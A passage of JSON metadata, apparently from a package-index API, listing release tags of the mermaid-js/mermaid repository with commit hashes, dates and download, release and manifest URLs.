/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1/manifests"},{"name":"v10.9.0","sha":"da33867ad798872d9f8406532263ff5e569f1185","kind":"commit","published_at":"2024-03-05T17:22:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0/manifests"},{"name":"v10.8.0","sha":"51e7444b94ab0b872eaabc3b138184b47442fab4","kind":"commit","published_at":"2024-02-02T10:10:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0/manifests"},{"name":"v10.7.0","sha":"dc857f804e955484b2f92cefc0aaa7b4afb159c4","kind":"commit","published_at":"2024-01-15T09:17:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0/manifests"},{"name":"v10.6.1","sha":"65daab2aaf8fc3e54f34b2d468d19486034e06c7","kind":"commit","published_at":"2023-11-06T13:57:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1/manifests"},{"name":"v10.6.0","sha":"29942c04dc92a64f8c618d6d55f9b57800341cf5","kind":"commit","published_at":"2023-10-25T09:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0/manifests"},{"name":"v10.5.1","sha":"b70959daa7666d25416ab3c4b89ffbc328927d20","kind":"commit","published_at":"2023-10-20T12:30:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1/manifests"},{"name":"v10.5.0","sha":"bb0d549d0dc489767b240a910a6831b4a7771fd2","kind":"commit","published_at":"2023-10-02T08:00:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0/manifests"},{"name":"v10.4.0","sha":"8e5275d8441def82597db534f5a15b27cc6376a7","kind":"commit","published_at":"2023-08-25T12:19:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0/manifests"},{"name":"v10.3.1","sha":"a0b80f5490f812ccbc74d6246f2ecc39b03db147","kind":"commit","published_at":"2023-08-11T12:03:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1/manifests"},{"name":"v10.3.0","sha":"165e0b6c6862e183c9bdb75fbc5839555bbc99d0","kind":"commit","published_at":"2023-07-26T07:49:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0/manifests"},{"name":"v10.2.4","sha":"453b337e6e0e6f02357293764c27c29c236fe848","kind":"commit","published_at":"2023-06-30T11:10:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4/manifests"},{"name":"v10.2.3","sha":"75f9de3d4ae79b8939607872fa9467d5413855ff","kind":"commit","published_at":"2023-06-08T14:24:25.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3/manifests"},{"name":"v10.2.2","sha":"d2409dc1638f1e8c3d006a3350b598d69d2f7a50","kind":"commit","published_at":"2023-06-02T06:50:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2/manifests"},{"name":"v10.2.1","sha":"48e5d743b3bb0264390644b0d054850d821097e5","kind":"commit","published_at":"2023-06-01T11:03:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1/manifests"},{"name":"v10.2.0","sha":"8d43b87200ba0b59f6800942e03154dccc6b57b7","kind":"commit","published_at":"2023-05-24T17:03:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0/manifests"},{"name":"v10.1.0","sha":"e7c237dcf3062cd6163e129aedc620ef08d6f89a","kind":"commit","published_at":"2023-04-04T13:19:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0/manifests"},{"name":"v9.4.3","sha":"1a7b8d38970f367e273b61599e6c4f75a8635158","kind":"commit","published_at":"2023-03-07T18:00:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3/manifests"},{"name":"v9.4.2","sha":"c965e4c4564441975b71f0996e3a7ec2167ae21d","kind":"commit","published_at":"2023-03-07T15:50:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2/manifests"},{"name":"v10.0.2","sha":"20298d243ad1bf0447800a3ec24851d6bac8b6fa","kind":"commit","published_at":"2023-03-02T12:45:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2/manifests"},{"name":"v10.0.1","sha":"4a9d96aaba6c5a1ebb295d085b421d9102d83e96","kind":"commit","published_at":"2023-03-01T13:04:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1/manifests"},{"name":"v10.0.0","sha":"555d4f2cdc83ebeaf0b41f57a05722ffb6d921af","kind":"commit","published_at":"2023-02-21T07:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0/manifests"},{"name":"v9.4.0","sha":"97614b8af56a122022a71267996c0646b4a1e312","kind":"commit","published_at":"2023-02-15T14:54:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0/manifests"},{"name":"v9.3.0","sha":"5735efacbe58634dcff91317170be2e010b7283e","kind":"commit","published_at":"2022-12-15T09:16:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0/manifests"},{"name":"v9.2.2","sha":"9bb0ed2040cce9be83c63e097e26e4b361a8bdd6","kind":"commit","published_at":"2022-11-09T14:54:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2/manifests"},{"name":"v9.2.1","sha":"ba7f83019f06d092a4549b98ebc97679fda196a8","kind":"commit","published_at":"2022-11-08T14:25:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1/manifests"},{"name":"v9.2.0","sha":"e78ac9b92a75223df728b4a1866a8d7d460a4691","kind":"commit","published_at":"2022-11-01T14:27:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0/manifests"},{"name":"v9.1.7","sha":"0c0468123fa1ca08baf69716eeca0b8872075b5e","kind":"commit","published_at":"2022-09-13T17:55:34.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7/manifests"},{"name":"9.1.6","sha":"a89b6fd0549a91fb09e72c4e40decf5a0b866828","kind":"commit","published_at":"2022-08-18T17:57:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6/manifests"},{"name":"9.1.5","sha":"af8a5cbbfac33c54d4b1615611fdcc7575180ef1","kind":"commit","published_at":"2022-08-11T18:29:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5/manifests"},{"name":"9.1.4","sha":"4dcf7feec02ed40e86ff23f78430e1074b6d5ab6","kind":"commit","published_at":"2022-08-04T18:25:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4/manifests"},{"name":"9.1.3","sha":"1509ee68bede6c6dc12bcc196d54b89f3b97ac4a","kind":"tag","published_at":"2022-06-28T18:03:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3/manifests"},{"name":"9.1.2","sha":"3b8d74f1f9be198617491809535158bdc83c2ed2","kind":"tag","published_at":"2022-06-14T17:31:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2/manifests"},{"name":"9.1.1","sha":"5a9ec30803398464688f7e460fc66a008814d7a2","kind":"tag","published_at":"2022-05-11T12:29:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1/manifests"},{"name":"9.1.0","sha":"8889b05d29442062c9162458fa595d5abd3903d4","kind":"tag","published_at":"2022-05-10T16:46:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0/manifests"},{"name":"9.0.1","sha":"179584b4bbfd3738d51021272819e48648b30614","kind":"tag","published_at":"2022-04-21T20:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1/manifests"},{"name":"9.0.0","sha":"f72d3c43723c30ba1eec825d97e46fae84e5b502","kind":"tag","published_at":"2022-04-07T18:47:11.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0/manifests"},{"name":"8.14.0","sha":"cbe3a9159db4d5e67d270fe701cd63de1510f6ee","kind":"tag","published_at":"2022-02-10T17:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.14.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0/manifests"},{"name":"8.13.11","sha":"3877b88e6e1dba5d3e52ea23fad66d0545ec5ab0","kind":"commit","published_at":"2022-02-10T16:10:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.11","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11/manifests"},{"name":"8.13.10","sha":"2de2cb64f8d0fa6917e0fae071c0a03bba10df83","kind":"commit","published_at":"2022-01-22T09:11:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10/manifests"},{"name":"8.13.9","sha":"77f2a57155cfd9375eb0f633d365b6bd75c31158","kind":"commit","published_at":"2022-01-16T14:28:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9/manifests"},{"name":"8.13.8","sha":"65592e0541790968703f16bc0b91a641b5443111","kind":"commit","published_at":"2021-12-28T16:31:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8/manifests"},{"name":"8.13.7","sha":"52af0476c14be9f98d669e336a5625f5fb609aee","kind":"commit","published_at":"2021-12-22T20:20:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7/manifests"},{"name":"8.13.6","sha":"a44714c715e49ff2dc86a401962dc5929b6eca06","kind":"commit","published_at":"2021-12-16T19:06:50.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6/manifests"},{"name":"real-8.13.5","sha":"7da80812e0510ae04f9ebf3a151a048ef9ce6834","kind":"commit","published_at":"2021-12-08T06:53:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/real-8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/real-8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@real-8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5/manifests"},{"name":"8.13.5","sha":"2ce18ec2a8c6f6c2ece20f749628443ac663119f","kind":"commit","published_at":"2021-12-07T22:09:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5/manifests"},{"name":"8.13.4","sha":"650bcef3d1f940a